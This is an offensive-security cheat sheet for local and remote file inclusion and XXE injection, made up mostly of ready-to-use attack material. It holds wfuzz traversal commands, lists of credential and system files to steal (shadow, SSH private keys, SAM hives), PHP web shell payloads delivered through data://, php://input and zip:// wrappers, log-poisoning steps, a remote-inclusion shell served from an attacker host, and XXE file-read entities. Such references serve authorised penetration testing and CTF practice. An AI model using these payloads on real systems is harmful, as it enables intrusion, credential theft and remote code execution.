LFI / XXE
01. Local File Inclusion (LFI)
01.1 Linux
Click here for wordlist
## ------------------| Linux
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hl 367
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hl 367
wget https://raw.githubusercontent.com/foospidy/payloads/master/other/traversal/dotdotpwn.txt
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w dotdotpwn.txt --hl 367
## ------------------| Windows
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt --hl 367
Useful LFI files
../../../etc/passwd
../../../../../../../../../../../../etc/passwd
/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.bash_history
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.bash_history
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa
/proc/self/environ
/proc/self/cmdline
/proc/net/tcp
/proc/sched_debug
/etc/apache2/sites-available/000-default.conf
../index.php
../../index.php
%2e%2e%2findex.php
%252e%252e%252findex.php
../../../../etc/passwd
/var/www/../../etc/passwd
../../../../../etc/passwd%00
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
....//....//etc/passwd
%252e%252e%252fetc%252fpasswd
%252e%252e%252fetc%252fpasswd%00
..///////..////..//////etc/passwd
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Configuration Files
## ------------------| Apache
/etc/apache2/apache2.conf
/usr/local/etc/apache2/httpd.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/apache2/sites-available/000-default.conf
/etc/httpd/conf/httpd.conf
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
## ------------------| nginx
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
/etc/nginx/sites-available/default
/etc/nginx/nginx.conf
/etc/nginx/proxy_params
## ------------------| MySql
/var/lib/mysql/mysql/user.frm
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYI
## ------------------| Tomcat
/usr/share/tomcat9/bin/catalina.sh
/usr/share/tomcat9/etc/tomcat-users.xml
/var/lib/tomcat9/conf/tomcat-users.xml
/var/lib/tomcat9/conf/server.xml
/var/lib/tomcat9/conf/web.xml
/var/lib/tomcat9/conf/
## ------------------| Microsoft IIS (ASP .NET)
/web.config
../web.config
..././web.config
## ------------------| Spring Boot
application.properties
application.yml
config/application.properties
config/application.yml
src/main/java/main.java
pom.xml
static/index.html
mvnw
mvnw.cmd
## ------------------| Flask
app.py
/app/app.py
config.py
/app/config.py
models.py
forms.py
utils.py
templates/index.html
static/script.js
requirements.txt
## ------------------| Webroot locations
/var/www/html/ # Apache
/usr/local/nginx/html/ # Nginx
c:\inetpub\wwwroot\ # IIS
C:\xampp\htdocs\ # XAMPP
C:\wamp\www\ # WAMP
Log Files
## ------------------| Generic:
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache/error.log
## ------------------| Red Hat/CentOS/Fedora Linux
/var/log/httpd/access_log
## ------------------| Debian/Ubuntu
/var/log/apache2/access.log
## ------------------| FreeBSD
/var/log/httpd-access.log
## ------------------| XAMPP
/xampp/apache/logs/access.log
/xampp/apache/logs/error.log
Download running binary file.
## ------------------| Identify runnable tasks and copy the PID
/proc/sched_debug
/proc/self/cmdline
## ------------------| Get the location for runnable process and download the file
/proc/<PID>/cmdline
## ------------------| Get linked libs
/proc/<PID>/maps
## ------------------| Get running process
/proc/sched_debug
01.2 Windows
Click here for wordlist
File Paths
..././Windows/win.ini
/Windows/win.ini
/windows/system32/license.rtf
/Windows/System32/drivers/etc/hosts
/Windows/debug/NetSetup.log
/Users/Administrator/NTUser.dat
/Documents and Settings/Administrator/NTUser.dat
/apache/logs/access.log
/apache/logs/error.log
/apache/php/php.ini
/boot.ini
/inetpub/wwwroot/global.asa
/MySQL/data/hostname.err
/MySQL/data/mysql.err
/MySQL/data/mysql.log
/MySQL/my.cnf
/MySQL/my.ini
/php4/php.ini
/php5/php.ini
/php/php.ini
/Program Files/Apache Group/Apache2/conf/httpd.conf
/Program Files/Apache Group/Apache/conf/httpd.conf
/Program Files/Apache Group/Apache/logs/access.log
/Program Files/Apache Group/Apache/logs/error.log
/Program Files/FileZilla Server/FileZilla Server.xml
/Program Files/MySQL/data/hostname.err
/Program Files/MySQL/data/mysql-bin.log
/Program Files/MySQL/data/mysql.err
/Program Files/MySQL/data/mysql.log
/Program Files/MySQL/my.ini
/Program Files/MySQL/my.cnf
/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
/Program Files/MySQL/MySQL Server 5.0/my.cnf
/Program Files/MySQL/MySQL Server 5.0/my.ini
/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
/Program Files (x86)/Apache Group/Apache/conf/access.log
/Program Files (x86)/Apache Group/Apache/conf/error.log
/Program Files (x86)/FileZilla Server/FileZilla Server.xml
/Program Files (x86)/xampp/apache/conf/httpd.conf
/WINDOWS/php.ini /WINDOWS/Repair/SAM
/Windows/repair/system /Windows/repair/software
/Windows/repair/security
/WINDOWS/System32/drivers/etc/hosts
/WINNT/php.ini
/WINNT/win.ini
/xampp/password
/xampp/tomcat/conf/tomcat-users.xml
/xampp/htdocs/index.php
/xampp/apache/conf/httpd.conf
/xampp/apache/bin/php.ini
/xampp/phpMyAdmin/config.inc.php
/xampp/apache/logs/access.log
/xampp/apache/logs/error.log
/Windows/Panther/Unattend/Unattended.xml
/Windows/Panther/Unattended.xml
/Windows/system32/config/AppEvent.Evt
/Windows/system32/config/SecEvent.Evt
/Windows/system32/config/default.sav
/Windows/system32/config/security.sav
/Windows/system32/config/software.sav
/Windows/system32/config/system.sav
/Windows/system32/config/regback/default
/Windows/system32/config/regback/sam
/Windows/system32/config/regback/security
/Windows/system32/config/regback/system
/Windows/system32/config/regback/software
/Program Files/MySQL/MySQL Server 5.1/my.ini
/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
/Windows/System32/inetsrv/config/applicationHost.config
/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
01.3 Wrappers & Filters
## ------------------| Basic
?page=data:text/plain,h4rithd
?page=data:text/plain,<?php system($_GET['cmd']); ?>
?page=data:text/plain,<?php echo shell_exec("whoami"); ?>
## ------------------| Base64 and rot13
?page=php://filter/read=string.rot13/resource=index.php
?page=php://filter/convert.base64-encode/resource=index.php
?page=pHp://FilTer/convert.base64-encode/resource=index.php
## ------------------| zlib
?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
## To read
# php -a #Starts a php console
# readfile('php://filter/zlib.inflate/resource=test.deflated');
## ------------------| zip://
# echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
# zip payload.zip payload.php;
# mv payload.zip shell.jpg;
# rm payload.php
?page=zip://shell.jpg%23payload.php
## ------------------| data://
?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
?page=data://text/plain,<?php phpinfo(); ?>
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
# NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
## ------------------| expect://
?page=expect://id
?page=expect://ls
## ------------------| input://
?page=php://input
# POST DATA: <?php system('id'); ?>
01.4 LFI to RCEs
include=('$file')
PHP Gadgets (New🔥)
## ------------------|
wget https://raw.githubusercontent.com/synacktiv/php_filter_chain_generator/main/php_filter_chain_generator.py
python3 php_filter_chain_generator.py --chain '<?php phpinfo(); ?>'
Log Poisoning
## ------------------| Basic Payload
<?php phpinfo(); ?>
<?php system($_REQUEST['cmd']); ?>
<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>'; ?>
## ------------------| Send for apache
nc <IP> 80
...enter..payload..here!...
## Your session/auth cookies or any type of session information store on
## ------------------| Linux
/tmp/sess_
/var/tmp/sess_
/var/lib/php/sessions/sess_
/proc/self/environ/ ## <-- use for User-Agent: <?=phpinfo(); ?>
/var/log/auth.log ## <-- use ssh '<?php system($_REQUEST['cmd']); ?>'@IP
/var/log/vsftpd.log ## <-- use above payload as username with ftp
var/log/apache2/access.log ## <-- use it from nc(BEST WAY!!) or use it as http://IP/<?php phpinfo(); ?>
## ------------------| Windows
\Windows\TEMP\sess_<session_id>
c:\xampp\apache\logs\access.log&cmd=ipconfig
01.5 Tricks
phpinfo() (file_uploads = on)
# Download this script
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion/phpinfolfi.py
01.6 LFI with python
Click
here
!
02. Remote File Inclusion
allow_url_include
nc -lvnp 80
## ------------------| Create payload file (php/txt)
<?php phpinfo(); ?>
<?php system($_REQUEST['cmd']); ?>
<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>'; ?>
## ------------------| Execute
### move file to /var/www/html and start apache sever
### execute
=http://<IP>/file.txt
02. XML external entity (XXE) injection
Common payloads
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
<productId>
&xxe;
</productId>
</stockCheck>
Filters
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php"> ]>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/hosts.php">
Last updated